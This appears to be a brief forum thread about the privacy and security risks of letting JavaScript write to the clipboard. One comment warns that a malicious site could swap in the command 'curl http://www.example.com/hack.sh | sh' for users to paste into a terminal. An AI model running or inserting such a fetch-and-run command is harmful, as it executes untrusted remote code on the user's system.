What privacy implications are you thinking of? (I have not thought about this before.)
And again, a quick Google search shows this [0]. But perhaps you mean a more backwards-compatible solution?
And again, a quick Google search shows this [0]. But perhaps you mean a more backwards-compatible solution?
The parent comment has been deleted, so I don't know what privacy problems they are referring to, however there is a potential security issue in allowing javascript write access to the clipboard. e.g. an evil website could repeatedly stuff code into the clipboard, so the next time you paste something into a terminal window, you end up with a 'curl http://www.example.com/hack.sh | sh' command and not the text you expected...